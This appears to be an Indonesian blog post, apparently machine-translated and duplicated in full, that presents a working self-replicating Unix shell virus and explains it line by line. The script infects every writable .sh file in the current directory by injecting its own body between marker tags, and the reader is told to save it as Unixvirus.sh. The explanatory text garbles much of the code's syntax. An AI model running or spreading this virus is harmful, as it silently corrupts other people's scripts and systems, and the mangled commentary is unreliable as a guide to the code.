UNIX SHELL Virus
Program ini adalah signifikansi praktis kecil, tapi sangat membantu untuk visual memahami mekanisme penyebaran virus. Oleh karena itu, signifikansi instruktif adalah lebih penting dari yang praktis.
Berikut programnya
Code:
#!/bin/sh
#file name: h3ll0s_demo.sh
#purpose: shell virus demonstration
#note: virus akan mempengaruhi semua file yang berakhir dengan *.sh dalam arus
direktori, tapi tidak akan mempengaruhi mereka berulang kali.
#compiler: watercloud@xfocus.org
#date: 13-12-2011
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Demo shell virus script !"
#E:<+!a%C&t:>
#EOF
Simpan dengan format Unixvirus.sh
Keterangan nya :
# B: <+% C & t:!>
Tubuh virus mulai tag, sehingga program ini dapat menemukan sendiri selama menyalin.
vFile = $ _;. vTmp = / tmp / .vTmp $ $
Mendefinisikan 2 variabel. Salah satunya adalah file sementara, catatan lain file-saat ininama $ _. Oleh karena itu diperlukan baris ini harus menjadi baris pertama dalam baris program yang efektif, jika tidak maka tidak mungkin untuk mendapatkan nama dari program saat ini, dan kemudian tidak mungkin untuk menemukan virus tubuh untuk menyalin.
untuk f di / *. sh;.do
Mulailah lingkaran, dan mengetahui semua program yang berakhir dengan sh di.saat ini direktori.
if [! -W $ f-a! -R $ vFile], then continue; fi
Jika target telah menulis hak istimewa dan jika file sumber virus telah membaca hak istimewa.
if grep '<+% C & t:!>' $ f, then continue; fi
Jika target telah ireversibel terpengaruh. Jika demikian itu akan bermoral untuk mempengaruhi lagi.
jika sed-n '1 p '$ f | grep' csh ', then continue; fi
Jika shell target di csh, mereka terlalu berbeda dalam tata bahasa.
cp-f $ f $ vTmp, jika [$? -Ne 0], then continue; fi
Dapatkan siap untuk mempengaruhi. Pertama salinan cadangan untuk target. Bagaimana jika menyalin gagal? Tentu saja tidak punya pilihan selain menyerah.
VNO=`awk '$ 0 ~ / (^ \ *#)|(^ b \ b *$)/&& v == NR-1 {v} + + END {print 0 + v}' $ vTmp`
untuk mengetahui awal dan ekspresi formal. Ini adalah salah satu digunakan untuk menemukan berapa banyak. komentar baris dan baris kosong di awal program, sehingga untuk menentukan tubuh virus menyuntikkan posisi.
sed-n "1, $ {} VNO p" $ vTmp> $ f
Sed Perintah menyalin bagian awal komentar dari file target kembali dari file cadangan.
(Sed-n '/ ^ # B: <+ a% K & t :>/,/^# E: <+ a% K & t:!> / P' $ vFile; echo)>> $ f
Satu lagi sed untuk menyelesaikan virus transportasi tubuh.
VNO = `expr $ VNO + 1`sed-n "$ {VNO}, \ $ p" $ vTmp>> $ f
Para sed terakhir bergerak bagian lain dari file target kembali. sed kuat!
rm-f $ vTmp
Bersihkan file-file sementara.dilakukan> / dev / null 2> & 1
Lingkaran berakhir.unset vTmp; unset vFile; unset VNO
Bersihkan TKP.echo "Demo shell virus script !"
Karena file tersebut telah dipengaruhi, menunjukkan beberapa indikasi untuk mengatakan ini adalah sebuah terpengaruh satu.
# EOF:
Tubuh virus berhenti penandaan, sehingga program menyalin menempatkan sendiri.
sumber : gilakomputer.net
Program ini adalah signifikansi praktis kecil, tapi sangat membantu untuk visual memahami mekanisme penyebaran virus. Oleh karena itu, signifikansi instruktif adalah lebih penting dari yang praktis.
Berikut programnya
Code:
#!/bin/sh
#file name: h3ll0s_demo.sh
#purpose: shell virus demonstration
#note: virus akan mempengaruhi semua file yang berakhir dengan *.sh dalam arus
direktori, tapi tidak akan mempengaruhi mereka berulang kali.
#compiler: watercloud@xfocus.org
#date: 13-12-2011
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Demo shell virus script !"
#E:<+!a%C&t:>
#EOF
Simpan dengan format Unixvirus.sh
Keterangan nya :
# B: <+% C & t:!>
Tubuh virus mulai tag, sehingga program ini dapat menemukan sendiri selama menyalin.
vFile = $ _;. vTmp = / tmp / .vTmp $ $
Mendefinisikan 2 variabel. Salah satunya adalah file sementara, catatan lain file-saat ininama $ _. Oleh karena itu diperlukan baris ini harus menjadi baris pertama dalam baris program yang efektif, jika tidak maka tidak mungkin untuk mendapatkan nama dari program saat ini, dan kemudian tidak mungkin untuk menemukan virus tubuh untuk menyalin.
untuk f di / *. sh;.do
Mulailah lingkaran, dan mengetahui semua program yang berakhir dengan sh di.saat ini direktori.
if [! -W $ f-a! -R $ vFile], then continue; fi
Jika target telah menulis hak istimewa dan jika file sumber virus telah membaca hak istimewa.
if grep '<+% C & t:!>' $ f, then continue; fi
Jika target telah ireversibel terpengaruh. Jika demikian itu akan bermoral untuk mempengaruhi lagi.
jika sed-n '1 p '$ f | grep' csh ', then continue; fi
Jika shell target di csh, mereka terlalu berbeda dalam tata bahasa.
cp-f $ f $ vTmp, jika [$? -Ne 0], then continue; fi
Dapatkan siap untuk mempengaruhi. Pertama salinan cadangan untuk target. Bagaimana jika menyalin gagal? Tentu saja tidak punya pilihan selain menyerah.
VNO=`awk '$ 0 ~ / (^ \ *#)|(^ b \ b *$)/&& v == NR-1 {v} + + END {print 0 + v}' $ vTmp`
untuk mengetahui awal dan ekspresi formal. Ini adalah salah satu digunakan untuk menemukan berapa banyak. komentar baris dan baris kosong di awal program, sehingga untuk menentukan tubuh virus menyuntikkan posisi.
sed-n "1, $ {} VNO p" $ vTmp> $ f
Sed Perintah menyalin bagian awal komentar dari file target kembali dari file cadangan.
(Sed-n '/ ^ # B: <+ a% K & t :>/,/^# E: <+ a% K & t:!> / P' $ vFile; echo)>> $ f
Satu lagi sed untuk menyelesaikan virus transportasi tubuh.
VNO = `expr $ VNO + 1`sed-n "$ {VNO}, \ $ p" $ vTmp>> $ f
Para sed terakhir bergerak bagian lain dari file target kembali. sed kuat!
rm-f $ vTmp
Bersihkan file-file sementara.dilakukan> / dev / null 2> & 1
Lingkaran berakhir.unset vTmp; unset vFile; unset VNO
Bersihkan TKP.echo "Demo shell virus script !"
Karena file tersebut telah dipengaruhi, menunjukkan beberapa indikasi untuk mengatakan ini adalah sebuah terpengaruh satu.
# EOF:
Tubuh virus berhenti penandaan, sehingga program menyalin menempatkan sendiri.
sumber : gilakomputer.net
Comments